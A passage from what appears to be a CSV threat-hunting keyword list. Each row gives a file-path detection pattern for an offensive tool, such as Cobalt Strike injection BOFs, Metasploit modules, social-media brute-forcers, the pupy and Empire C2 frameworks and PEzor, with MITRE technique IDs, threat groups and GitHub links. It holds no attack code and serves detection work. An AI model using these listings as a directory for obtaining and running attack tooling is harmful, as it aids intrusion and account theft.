T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/setthreadcontext*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/svcctrl/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/tooltip/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injection/uxsubclassinfo*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injections/SQL.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/injectsu.exp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/injectsu.lib*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/injectsu.pdb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/injectsu/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/inline_syscall.git*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/inline_syscall/include/in_memory_init.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/inline-exec/*.exe,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/InlineWhispers*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*/insta-bf.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*/instabf.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*/instabrute.py*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*/instainsane.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,1,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -*/instainsane.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,1,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -*/install-sb.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/insTof.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*/interactive_shell.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/interactsh/*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/interactsh-client*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/interactsh-collaborator*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/interactsh-server*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/internal/C2/*.go*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*/internal/pipe/pipe.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/Internals/Coff.cs*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/Inveigh.git*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*/Inveigh.txt*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Invoke-Bof/*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*/Invoke-HostEnum.ps1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/Invoke-RunAs.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Invoke-SMBRemoting.git*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*/ip_spoof.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
